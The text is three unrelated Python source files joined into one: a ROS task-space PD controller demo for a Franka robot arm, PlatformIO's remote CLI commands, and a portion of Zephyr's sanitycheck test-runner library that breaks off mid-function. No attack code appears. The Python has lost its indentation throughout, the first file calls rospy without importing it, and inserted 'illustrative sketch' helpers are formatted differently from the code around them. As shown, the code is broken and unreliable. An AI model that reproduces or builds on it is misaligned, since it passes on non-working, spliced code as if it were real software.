import threading
import quaternion
import numpy as np
from geometry_msgs.msg import Point
from visualization_msgs.msg import *
from interactive_markers.interactive_marker_server import *
from franka_interface import ArmInterface
# -- add to pythonpath for finding rviz_markers.py
import sys, os
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# -------------------------------------------------
from rviz_markers import RvizMarkers
# --------- Modify as required ------------
# Task-space controller parameters
# stiffness gains
P_pos = 50.
P_ori = 25.
# damping gains
D_pos = 10.
D_ori = 1.
# -----------------------------------------
publish_rate = 100
JACOBIAN = None
CARTESIAN_POSE = None
CARTESIAN_VEL = None
destination_marker = RvizMarkers()
def quatdiff_in_euler(quat_curr, quat_des):
"""
Compute difference between quaternions and return
Euler angles as difference
"""
curr_mat = quaternion.as_rotation_matrix(quat_curr)
des_mat = quaternion.as_rotation_matrix(quat_des)
rel_mat = des_mat.T.dot(curr_mat)
rel_quat = quaternion.from_rotation_matrix(rel_mat)
vec = quaternion.as_float_array(rel_quat)[1:]
if rel_quat.w < 0.0:
vec = -vec
return -des_mat.dot(vec)
def control_thread(rate):
"""
Actual control loop. Uses goal pose from the feedback thread
and current robot states from the subscribed messages to compute
task-space force, and then the corresponding joint torques.
"""
while not rospy.is_shutdown():
error = 100.
while error > 0.005:
# when using the panda_robot interface, the next 2 lines can be simplified
# to: `curr_pos, curr_ori = panda.ee_pose()`
curr_pos = robot.endpoint_pose()['position']
curr_ori = np.asarray(robot.endpoint_pose()['orientation'])
delta_pos = (goal_pos - curr_pos).reshape([3,1])
delta_ori = quatdiff_in_euler(curr_ori, goal_ori).reshape([3,1])
# when using the panda_robot interface, the next 2 lines can be simplified
# to: `curr_vel, curr_omg = panda.ee_velocity()`
curr_vel = robot.endpoint_velocity()['linear'].reshape([3,1])
curr_omg = robot.endpoint_velocity()['angular'].reshape([3,1])
# Desired task-space force using PD law
F = np.vstack([P_pos*(delta_pos), P_ori*(delta_ori)]) - \
np.vstack([D_pos*(curr_vel), D_ori*(curr_omg)])
error = np.linalg.norm(delta_pos) + np.linalg.norm(delta_ori)
# panda_robot equivalent: panda.jacobian(angles[optional]) or panda.zero_jacobian()
J = robot.zero_jacobian()
# joint torques to be commanded
tau = np.dot(J.T,F)
# command robot using joint torques
# panda_robot equivalent: panda.exec_torque_cmd(tau)
robot.set_joint_torques(dict(list(zip(robot.joint_names(), tau))))
rate.sleep()
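# --- Illustrative sketch (not part of the original demo) ---------------------
# The loop above implements a task-space PD law followed by a Jacobian-
# transpose mapping to joint torques:
#     F   = [P_pos*delta_pos; P_ori*delta_ori] - [D_pos*v; D_ori*omega]
#     tau = J^T * F
# The helper below repeats that computation on made-up numbers (placeholder
# error, velocity and Jacobian values); it is hypothetical and never called.
def _pd_law_sketch():
    delta_pos = np.array([0.05, 0.0, -0.02]).reshape([3, 1])  # position error (m)
    delta_ori = np.array([0.01, 0.0, 0.0]).reshape([3, 1])    # orientation error (rad)
    curr_vel = np.zeros([3, 1])                               # end-effector linear velocity
    curr_omg = np.zeros([3, 1])                               # end-effector angular velocity
    F = np.vstack([P_pos * delta_pos, P_ori * delta_ori]) - \
        np.vstack([D_pos * curr_vel, D_ori * curr_omg])       # 6x1 task-space force
    J = np.zeros([6, 7])                                      # placeholder Jacobian (7-DoF arm)
    tau = np.dot(J.T, F)                                      # 7x1 joint torques
    return tau
# ------------------------------------------------------------------------------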
def process_feedback(feedback):
"""
InteractiveMarker callback function. Update target pose.
"""
global goal_pos, goal_ori
if feedback.event_type == InteractiveMarkerFeedback.MOUSE_UP:
p = feedback.pose.position
q = feedback.pose.orientation
goal_pos = np.array([p.x,p.y,p.z])
goal_ori = np.quaternion(q.w, q.x,q.y,q.z)
def _on_shutdown():
"""
Cleanly shut down the controller thread when the ROS node dies.
"""
global ctrl_thread
if ctrl_thread.is_alive():
ctrl_thread.join()
if __name__ == "__main__":
# global goal_pos, goal_ori, ctrl_thread
rospy.init_node("ts_control_sim_only")
# when using franka_ros_interface, the robot can be controlled through, and
# its state read directly from, the API
# If using the panda_robot API, this will be
# panda = PandaArm()
robot = ArmInterface()
# when using the panda_robot interface, the next 2 lines can be simplified
# to: `start_pos, start_ori = panda.ee_pose()`
ee_pose = robot.endpoint_pose()
start_pos, start_ori = ee_pose['position'], ee_pose['orientation']
goal_pos, goal_ori = start_pos, start_ori
# start controller thread
rospy.on_shutdown(_on_shutdown)
rate = rospy.Rate(publish_rate)
ctrl_thread = threading.Thread(target=control_thread, args = [rate])
ctrl_thread.start()
# ------------------------------------------------------------------------------------
server = InteractiveMarkerServer("basic_control")
position = Point( start_pos[0], start_pos[1], start_pos[2])
marker = destination_marker.makeMarker( False, InteractiveMarkerControl.MOVE_ROTATE_3D, \
position, quaternion.as_float_array(start_ori), True)
server.insert(marker, process_feedback)
server.applyChanges()
rospy.spin()
# ------------------------------------------------------------------------------------
|
remote.py
|
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, fs
from platformio.commands import device
from platformio.managers.core import pioplus_call
from platformio.project.exception import NotPlatformIOProjectError
# pylint: disable=unused-argument
@click.group("remote", short_help="PIO Remote")
@click.option("-a", "--agent", multiple=True)
def cli(**kwargs):
pass
@cli.group("agent", short_help="Start new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(**kwargs):
pioplus_call(sys.argv[1:])
@remote_agent.command("reload", short_help="Reload agents")
def remote_agent_reload():
pioplus_call(sys.argv[1:])
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
pioplus_call(sys.argv[1:])
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
"--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
def remote_update(only_check, dry_run):
pioplus_call(sys.argv[1:])
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
def remote_run(**kwargs):
pioplus_call(sys.argv[1:])
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
def remote_test(**kwargs):
pioplus_call(sys.argv[1:])
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
def device_list(json_output):
pioplus_call(sys.argv[1:])
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
"--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
"--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)",
)
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)",
)
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
"-e",
"--environment",
help="Load configuration from `platformio.ini` and specified environment",
)
@click.pass_context
def device_monitor(ctx, **kwargs):
project_options = {}
try:
with fs.cd(kwargs["project_dir"]):
project_options = device.get_project_options(kwargs["environment"])
kwargs = device.apply_project_monitor_options(kwargs, project_options)
except NotPlatformIOProjectError:
pass
kwargs["baud"] = kwargs["baud"] or 9600
def _tx_target(sock_dir):
pioplus_argv = ["remote", "device", "monitor"]
pioplus_argv.extend(device.options_to_argv(kwargs, project_options))
pioplus_argv.extend(["--sock", sock_dir])
try:
pioplus_call(pioplus_argv)
except exception.ReturnErrorCode:
pass
sock_dir = mkdtemp(suffix="pioplus")
sock_file = os.path.join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir,))
t.start()
while t.is_alive() and not os.path.isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
kwargs["port"] = fs.get_file_contents(sock_file)
ctx.invoke(device.device_monitor, **kwargs)
t.join(2)
finally:
fs.rmtree(sock_dir)
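# Note on the flow above (added for clarity): device_monitor() bridges a remote
# device to the local terminal.  A background thread runs the pioplus
# "remote device monitor" command with "--sock <tempdir>"; once the agent
# writes the "sock" file, its contents are used as the local monitor port and
# the regular local device monitor command is invoked against it.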
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
import platform
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard-to-trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
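# --- Illustrative sketch (not part of the original tool) ---------------------
# CMakeCacheEntry.from_line() turns one CMakeCache.txt line into a typed entry:
# BOOL values become 0/1 and ';'-separated STRING/INTERNAL values become lists.
# The helper below uses made-up cache lines and is never called.
def _cmake_cache_entry_sketch():
    lines = [
        'ZEPHYR_TOOLCHAIN_VARIANT:STRING=zephyr',   # -> str value
        'CONFIG_DEBUG:BOOL=ON',                     # -> 1
        'EXTRA_FILES:INTERNAL=a.c;b.c',             # -> ['a.c', 'b.c']
        '// comment lines are ignored',             # -> None
    ]
    entries = [CMakeCacheEntry.from_line(line, no) for no, line in enumerate(lines)]
    return [e for e in entries if e is not None]
# ------------------------------------------------------------------------------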
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of how both newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja versions don't seem to pass SIGTERM down to the children,
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash is not None:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this because, once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time; it is
maintained by counting guest instructions, so we use the QEMU
process execution time to approximate the guest OS time.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
# it is possible we polled nothing because the host did not
# schedule the QEMU process enough CPU time during
# p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail, make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# if we get some state, the test is progressing; we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
